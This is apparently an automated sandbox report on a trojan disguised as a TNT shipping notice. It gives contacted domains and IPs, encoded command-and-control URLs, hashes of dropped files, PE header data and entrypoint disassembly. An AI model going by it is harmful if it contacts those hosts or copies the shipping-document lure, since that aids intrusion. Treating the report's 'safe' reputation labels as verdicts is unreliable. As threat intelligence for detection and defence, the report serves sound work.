https://gamesfunny.top$	getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://badges.ausowned.com.au/07634	getmac.exe, 00000004.00000002.3835029456.0000000007EE0000.00000004.00000800.00020000.00000000.sdmp, getmac.exe, 00000004.00000002.3833043675.00000000064E2000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003E62000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.5.1.min.js	getmac.exe, 00000004.00000002.3833043675.0000000007172000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004AF2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css	getmac.exe, 00000004.00000002.3833043675.0000000006674000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000003FF4000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.iqejgn.asia/9rz8/?wLTtn0=1tNn	getmac.exe, 00000004.00000002.3833043675.0000000006806000.00000004.10000000.00040000.00000000.sdmp, hoCcQGubWgo.exe, 00000006.00000002.3831925360.0000000004186000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	getmac.exe, 00000004.00000003.1752458219.00000000081CE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.57.64.102	www.ayypromo.shop	Bosnia and Herzegowina	47959	TELINEABA	false
45.33.30.197	www.meetfactory.biz	United States	63949	LINODE-APLinodeLLCUS	false
194.195.220.41	www.ytonetgearhub.shop	Germany	6659	NEXINTO-DE	false
13.248.169.48	www.izen.group	United States	16509	AMAZON-02US	false
64.64.253.144	ak7y10.tta88.com	Canada	25820	IT7NETCA	false
154.23.184.207	7ddw.top	United States	174	COGENT-174US	false
103.42.108.46	www.mtmoriacolives.store	Australia	45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
68.183.37.14	smashcoin.club	United States	14061	DIGITALOCEAN-ASNUS	false
104.21.17.191	www.moodplay.store	United States	13335	CLOUDFLARENETUS	false
198.54.126.42	ahabet.asia	United States	22612	NAMECHEAP-NETUS	false
141.94.102.188	4u2b.online	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
178.63.50.103	www.keswickstream.online	Germany	24940	HETZNER-ASDE	false
203.161.46.201	www.zippio.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	false
45.76.85.183	www.iqejgn.asia	United States	20473	AS-CHOOPAUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1488540
Start date and time:	2024-08-06 07:55:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@18/15
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 47 Number of non-executed functions: 292
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.119.148.38
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hoCcQGubWgo.exe, PID 1108 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:57:16	API Interceptor	11422436x Sleep call for process: getmac.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.33.30.197	https://widget.acdovery.com/script/13529	Get hash	malicious	Unknown	Browse	widget.acdovery.com/script/13529?gp=1&js=1&uuid=1710496525.0046378740&other_args=eyJ1cmkiOiAiL3NjcmlwdC8xMzUyOSIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
	https://fonts.goggleapis.com	Get hash	malicious	Unknown	Browse	fonts.goggleapis.com/?gp=1&js=1&uuid=1708332813.0074160085&other_args=eyJ1cmkiOiAiLyIsICJhcmdzIjogIiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0=
	v3Pk16a5xJ.exe	Get hash	malicious	FormBook	Browse	www.monoploygo.wiki/iskm/?qvqLkP=DnM8xjdPmQXukEG/ct3xe01w3oYraVVStgIXscJDle9o38/9IVF6rW+JRaE9WBvAoUXuL1ikwQ5dr0xo3rIRuPLo7pcTzAo3fw==&PDq4=L4NhCxe0UD
	ldg1QwGnSwrKaNu.exe	Get hash	malicious	FormBook, zgRAT	Browse	www.alwayswim.com/nd9s/?p0Y8KzoP=s4teW/+vhXj7AmcnbAz/238POSdejZfwbuM2wv36a97ZYD3ud7X5LXS1q9u99YIyoCvsjPStwPOgG5Uv9/tCjM0fzIsroA1pHw==&rbs=bhAhX8-h7znHxf60
	SDFormatter.exe	Get hash	malicious	Unknown	Browse	mycampusjuice.com/z9r0qh.php?k=l410op94z7hr
	http://www.nice.org/guidance/cg169	Get hash	malicious	Unknown	Browse	www.nice.org/guidance/cg169?gp=1&js=1&uuid=1699363165.0098012384&other_args=eyJ1cmkiOiAiL2d1aWRhbmNlL2NnMTY5IiwgImFyZ3MiOiAiIiwgInJlZmVyZXIiOiAiIiwgImFjY2VwdCI6ICJ0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSxpbWFnZS9hdmlmLGltYWdlL3dlYnAsaW1hZ2UvYXBuZywqLyo7cT0wLjgsYXBwbGljYXRpb24vc2lnbmVkLWV4Y2hhbmdlO3Y9YjM7cT0wLjcifQ==
	FC9259zAIF.exe	Get hash	malicious	FormBook, STRRAT	Browse	www.owcojyyde.best/hpon/?pl=3TGL+UwojOidzK1Rec3gXGqJMVmcWLkgFdMppFUDjftmCDvQRnQPNeT9S45ZkkPao1u8fmRn7EZsF4auVabCpcxnz2Uu+8usNQ==&XhL2C=3Tc-y5F-T0uc
	ecotrade_ERM_CONTRAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.contractorrevenge.com/egtq/?n27ZP1=nfbyN+m9jY8E4zj/sQJlss2l+ff/cvl0V4XJoEDzHNb/Py0yBAK11i4O0moqlZAlr/0P49dqSAVSNpZHoNZV8rYfC05Wm/iSQw==&6Kff=N7tCc3ZGW0tPCO
	SR-2305001-C_TIBILISI.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.contractorrevenge.com/egtq/?37=nfbyN+m9jY8E4zj/sQJlss2l+ff/cvl0V4XJoEDzHNb/Py0yBAK11i4O0moqlZAlr/0P49dqSAVSNpZHoNZV8rYfC05Wm/iSQw==&T_=JRol882mKOYP6
	Dagplejers.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.franchisevideography.com/6vse/?2F=MP4aJTqYC4vQMBtENwlhfMq8DEkCA6FU41CifmM7zlVilMBpP7k0fJAVYKZLDpHGK+bW65bO27W9Q0vaj6/TZG0ALnN1iW9mqQ==&3q_FxM=3Ya3NOfAde17V
194.195.220.41	swift_payment_pdf.exe	Get hash	malicious	FormBook	Browse	www.cheapdesklamp.shop/9nq7/
13.248.169.48	SecuriteInfo.com.Win32.RATX-gen.24742.674.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.ansverity.com/7llb/
	mtTw7o41OC.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.eworld.org/18e1/
	TT Application copy.exe	Get hash	malicious	FormBook	Browse	www.feeless.shop/4scb/
	irlsever.doc	Get hash	malicious	FormBook	Browse	www.eworld.org/18e1/
	IIMG_00172424.exe	Get hash	malicious	FormBook	Browse	www.ansverity.com/7llb/
	eqqjbbjMlt.elf	Get hash	malicious	Unknown	Browse	freemasongeorgewashington.org/
	bJrO2iUerN.elf	Get hash	malicious	Unknown	Browse	ns1.doxepinpreis.space/
	SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exe	Get hash	malicious	FormBook	Browse	www.ansverity.com/7llb/
	Documente de expediere.exe	Get hash	malicious	FormBook	Browse	www.ecoaxion.com/m8jb/
	Shipping Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.ansverity.com/7llb/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	Quotation-581024.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	toeORRsgUX.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SHIPPING DETAILS.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	QUOTATION.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Shipment Files EG240711& EG240712.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Payment ConfirmationSwift copy.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	85.159.66.93
	Shipping documentsInvoice and Packing List, Certificate of Origin.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	draft Proforma Invoice.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	QLLafoDdqv.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	6ddrUd6iQo.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.keswickstream.online	draft Proforma Invoice.exe	Get hash	malicious	FormBook	Browse	178.63.50.103

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINODE-APLinodeLLCUS	SecuriteInfo.com.Win64.MalwareX-gen.14374.32326.exe	Get hash	malicious	Unknown	Browse	172.105.47.96
	Shipment Files EG240711& EG240712.exe	Get hash	malicious	FormBook	Browse	72.14.185.43
	Myinfotechpartner.pdf	Get hash	malicious	HTMLPhisher	Browse	66.228.41.61
	SecuriteInfo.com.W32.PossibleThreat.30498.16987.exe	Get hash	malicious	Unknown	Browse	109.74.206.151
	SecuriteInfo.com.W32.PossibleThreat.30498.16987.exe	Get hash	malicious	Unknown	Browse	109.74.206.151
	https://www.chitradev.com/chi/	Get hash	malicious	HTMLPhisher	Browse	173.255.253.159
	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	72.14.185.43
	https://nathancrane.acemlnb.com/lt.php?x=3DZy~GE6Unib6H_8zt9NU.ls1KIjjNH3vMVhYKc3J3WZ7835yEy.0OFr13VziNHyjvYyY6HHKnSe	Get hash	malicious	Unknown	Browse	45.33.2.97
	c35Dw4AFtB.elf	Get hash	malicious	Mirai	Browse	45.56.127.8
	http://hcsecu.narrato.io/cws/s/7kDf_UlD/	Get hash	malicious	HTMLPhisher	Browse	72.14.185.146
NEXINTO-DE	rf4LFk7Nvv.elf	Get hash	malicious	Mirai	Browse	194.195.1.127
	WIwTo1UTMq.elf	Get hash	malicious	Mirai	Browse	195.180.12.62
	file.exe	Get hash	malicious	SystemBC	Browse	194.163.142.67
	LisectAVT_2403002A_280.exe	Get hash	malicious	PikaBot	Browse	194.233.91.144
	LisectAVT_2403002A_280.exe	Get hash	malicious	PikaBot	Browse	194.233.91.144
	4qOdQ3lrYx.elf	Get hash	malicious	Mirai	Browse	212.229.189.186
	D6q8x28T6b.elf	Get hash	malicious	Mirai	Browse	212.228.182.107
	ZPPEqPIBy7.elf	Get hash	malicious	Unknown	Browse	195.179.35.79
	Suav289vuI.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	194.163.137.2
	lyt9YXdc00.elf	Get hash	malicious	Unknown	Browse	212.229.18.34
TELINEABA	sKQrQ9KjPJ.elf	Get hash	malicious	Mirai	Browse	88.214.61.219
	KE4cyjDEDO.elf	Get hash	malicious	Mirai	Browse	88.214.61.224
	http://91.223.169.83	Get hash	malicious	Unknown	Browse	91.223.169.83
	2hUhvRdIqt.elf	Get hash	malicious	Mirai	Browse	88.214.61.255
	PkQB1rE5kK.elf	Get hash	malicious	Mirai	Browse	88.214.61.240
	mUZS5TqzCm.elf	Get hash	malicious	Mirai	Browse	45.93.94.133
	5tuUOk0hKz.elf	Get hash	malicious	Mirai	Browse	88.214.61.216
	TggWCRH7SZ.elf	Get hash	malicious	Mirai	Browse	88.214.61.242
	zHBHzJVmcw.elf	Get hash	malicious	Mirai	Browse	88.214.61.215
	skid.arm.elf	Get hash	malicious	Mirai	Browse	88.214.61.227

Process:	C:\Windows\SysWOW64\getmac.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autC1A7.tmp

Download File

Process:	C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.996468225066126
Encrypted:	true
SSDEEP:	6144:HAo2a/cK+g/cvcZzoy2Ab1ExhBsVITX7+HhZ+4pv4gtw70xwJUTspW:HAo2a/p7cUOBsWZTL+HD+4Vk70x4zM
MD5:	63E2721ADEA66900C54926C9A506758E
SHA1:	00A3F54319C12BFAEDCD8775CBC31D7B048EF3EE
SHA-256:	2AAAE4BDCC595BDEF8B5B7D31BD2DAA6C6E6FFB3A5F816DF248E89B0EFE66E99
SHA-512:	EF01B6A649898E3BC4A2B80E7378718CD8EF94B84E5FCC631CA5BA86D0D29683CC17751084D947770A67FE4A88C9E408788BEEB62F1A72C09ECD36BE02D7BB2B
Malicious:	false
Reputation:	low
Preview:	.....EF0X..;....v.5A...~6L...LWRREF0XGZZ23IA6J15BP9UV5DT3KL.RREH/.IZ.;.h.7....8P&vE6;T9-:r1$(^73z8W.;4XjX[b.v.vX+0VeAZXvEF0XGZZK2@..V..0^.kU#.)..h2"...fRT.[...."7..?V,iS,.WRREF0XG..23.@7JF[..9UV5DT3K.WPSNG;XG.^23IA6J15BP-UV5TT3K<SRRE.0XWZZ21IA0J15BP9UP5DT3KLWR"AF0ZGZZ23IC6..5B@9UF5DT3[LWBREF0XGJZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5j V38WRRQ.4XGJZ23.E6J!5BP9UV5DT3KLWRrEFPXGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23

C:\Users\user\AppData\Local\Temp\autC1D7.tmp

Download File

Process:	C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
File Type:	data
Category:	dropped
Size (bytes):	9802
Entropy (8bit):	7.646740925566838
Encrypted:	false
SSDEEP:	192:ekTYCxDR8l9LfBhZBK5iKkaV3pySGiuErhTVdPN+14CScHn5BbwQk819+1AcrN:5T19WLLZBbKkAAbErhTNZC1HnEH1Fp
MD5:	CF0CD1C8DD2558773933248DB3B6F600
SHA1:	0ABE6DC3E5A6355DC5E6185A16D6DB8363A3A78A
SHA-256:	217FC257B916D54A0346415A99E8F038CC2AF6073362138B85B310B54EE85EDB
SHA-512:	B6FFE70FAA4189D19DA4FA14064BC398F76AFB034227BD127C07940EF987936CE5BE26969618451FE87A8D1CD22AF7E637B7477AAADD33AF0F5F27C03475BAF9
Malicious:	false
Reputation:	low
Preview:	EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........\|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B\|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j\|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3\|v...G.9..&.8_..uh..i\|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.\|...B3....@.;=.X...f.....H........g....M.S.T..h...

C:\Users\user\AppData\Local\Temp\cerecloths

Download File

Process:	C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.996468225066126
Encrypted:	true
SSDEEP:	6144:HAo2a/cK+g/cvcZzoy2Ab1ExhBsVITX7+HhZ+4pv4gtw70xwJUTspW:HAo2a/p7cUOBsWZTL+HD+4Vk70x4zM
MD5:	63E2721ADEA66900C54926C9A506758E
SHA1:	00A3F54319C12BFAEDCD8775CBC31D7B048EF3EE
SHA-256:	2AAAE4BDCC595BDEF8B5B7D31BD2DAA6C6E6FFB3A5F816DF248E89B0EFE66E99
SHA-512:	EF01B6A649898E3BC4A2B80E7378718CD8EF94B84E5FCC631CA5BA86D0D29683CC17751084D947770A67FE4A88C9E408788BEEB62F1A72C09ECD36BE02D7BB2B
Malicious:	false
Reputation:	low
Preview:	.....EF0X..;....v.5A...~6L...LWRREF0XGZZ23IA6J15BP9UV5DT3KL.RREH/.IZ.;.h.7....8P&vE6;T9-:r1$(^73z8W.;4XjX[b.v.vX+0VeAZXvEF0XGZZK2@..V..0^.kU#.)..h2"...fRT.[...."7..?V,iS,.WRREF0XG..23.@7JF[..9UV5DT3K.WPSNG;XG.^23IA6J15BP-UV5TT3K<SRRE.0XWZZ21IA0J15BP9UP5DT3KLWR"AF0ZGZZ23IC6..5B@9UF5DT3[LWBREF0XGJZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5j V38WRRQ.4XGJZ23.E6J!5BP9UV5DT3KLWRrEFPXGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23IA6J15BP9UV5DT3KLWRREF0XGZZ23

C:\Users\user\AppData\Local\Temp\subbase

Download File

Process:	C:\Users\user\Desktop\TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	modified
Size (bytes):	28674
Entropy (8bit):	3.587967949290487
Encrypted:	false
SSDEEP:	768:XBQPZgXIfqTz4G04QnW1n2mPAmg0zQ+tWni6g0k3q:wZ/fqH4G04QnWx2yAz0hfc
MD5:	1494E910BAE001A1B4D6878FDBDEA484
SHA1:	94732D271365F83303DE6C400321E5E42C3CB389
SHA-256:	34A2F36143C405CD1493D2FFA29C1D82D7DFC994E9901D937360FF6DB7B45A20
SHA-512:	396D748D7C82E4BE4344653ED44A4E7EF5C9AF5561F2B55DEE424A2B3A7FDDDD281F23471984CED2B0431E48A1042C10F1EB878BA5BFBC938091DB691C7B085D
Malicious:	false
Reputation:	low
Preview:	5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.148431139389533
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exe
File size:	1'262'592 bytes
MD5:	430eabd3f3bc703cd6d9a25a815258cf
SHA1:	9e4a589ba42030204939212d924bd365a6233a60
SHA256:	16c27de38c93b69fdf3a9b9998f819358db3e34d74cbd7c7b4c5d5abf373de28
SHA512:	47a75212e38709e3045395e239d95c7d231e1069257e904d9d6cf1dbce85d7eef8d595248442373cc55fe6bbfb6db90e16ead2219517177c27b30a0fa0088121
SSDEEP:	24576:8qDEvCTbMWu7rQYlBQcBiT6rprG8aZUQPehcngapMBzDY:8TvC/MTQYxsWR7aZNPenap8z
TLSH:	0E45C00273D1D062FF9B92334B5AF6115BBC6A260123E61F13A81D7ABD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66B09287 [Mon Aug 5 08:51:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FC7184FABB3h
jmp 00007FC7184FA4BFh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC7184FA69Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC7184FA66Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FC7184FD25Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FC7184FD2A8h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FC7184FD291h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x5d9f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
